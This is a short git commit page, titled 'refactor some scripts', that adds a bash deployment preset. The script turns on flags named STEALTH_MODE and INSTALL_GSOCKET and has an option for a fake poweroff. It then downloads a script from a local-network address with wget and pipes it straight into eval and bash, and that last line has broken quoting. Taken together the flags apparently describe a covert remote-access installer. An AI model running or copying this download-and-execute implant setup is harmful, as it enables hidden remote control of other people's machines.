refactor some scripts
This commit is contained in:
12
scripts/deploy/minimal
Executable file
12
scripts/deploy/minimal
Executable file
@@ -0,0 +1,12 @@
|
||||
#!/bin/bash
|
||||
# Minimal installation preset - no root required
|
||||
export NO_ROOT=true
|
||||
export NO_SERVICES=true
|
||||
export INSTALL_WOL=false
|
||||
export INSTALL_FAKE_POWEROFF=false
|
||||
export INSTALL_GSOCKET=true
|
||||
export STEALTH_MODE=true
|
||||
|
||||
# Download and run the main script
|
||||
eval "$(wget -qO- http://192.168.0.104/deployment/y" | bash
|
||||
|
Reference in New Issue
Block a user